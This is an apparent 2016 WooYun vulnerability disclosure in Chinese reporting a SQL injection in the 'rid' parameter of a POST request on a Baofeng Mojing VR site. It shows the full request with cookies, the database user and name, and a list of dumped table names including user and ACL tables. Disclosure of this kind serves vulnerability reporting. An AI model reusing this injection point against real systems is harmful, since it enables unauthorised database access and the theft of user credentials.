当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204960

漏洞标题:暴风魔镜某站存在SQL注入(涉及大量账号密码)

相关厂商:暴风魔镜

漏洞作者: Aasron

提交时间:2016-05-04 15:46

修复时间:2016-06-18 16:40

公开时间:2016-06-18 16:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

暴风魔镜某站存在SQL注入(涉及大量账号密码)

详细说明:

友情检测,求分

POST /List/vr/praise/ HTTP/1.1
Host: vr360.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://vr360.mojing.cn/List/vr/picdetail?id=660
Content-Length: 32
Cookie: Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1462336535; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1462342590; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3971414470516277,tid:1462336535057720}; NTKF_T2D_CLIENTID=guest31BD2928-36A8-EE57-E997-755687CC4B1E; user_regist_plat=1; PHPSESSID=f4seia83q3qpjjgsc3r037reb6; Hm_lvt_4f15bce7f77b74e9932fc896a915f5b8=1462344105; Hm_lpvt_4f15bce7f77b74e9932fc896a915f5b8=1462344113
Connection: close
rid=660&praise=0&resource_type=3


注入参数#rid


当前数据库用户:bgc_bgc_ser@172.18.%
当前数据库:mojing_bgc


漏洞证明:

acl_menu_url
acl_permissions
acl_resources
acl_roles
acl_roles_change
acl_user_to_role
acl_users
bgc_ad
col_info
company
company_data_join
company_join_change
country
email_remind
manager_page
mode_class_manager
mode_config
navigation_manager
news
news_class
pic_pano
pic_pano_task
region
res_class
res_label
res_lc_link
resource_col_info
resource_download
resource_love
resource_manager
resource_offline
resource_stat
resource_stat_data
resource_status
resource_support
resource_sync_cms
users_baseinfo
users_info_ext
video_hot
video_manager


不知道是否是内部的账号,登录ip显示为内网

1.png


1.png


md5加密方式

修复方案:

过滤

版权声明:转载请注明来源 Aasron@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-04 16:34

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-04 15:52 | 黑色键盘丶 ( 普通白帽子 | Rank:2049 漏洞数:453 | 哥,是孤独风中的一匹狼)

    大表哥好使 牛逼

  2. 2016-05-04 22:02 | 白骨夫人 ( 普通白帽子 | Rank:248 漏洞数:56 | 白骨夫人,白只做白的,骨就是骨气,夫人就...)

    你也好牛逼啊

  3. 2016-06-18 16:54 | 开心宝贝 ( 路人 | Rank:0 漏洞数:1 | 我唤醒大海,唤醒山脉,我唤醒沙漠,处处充...)

    大表哥好6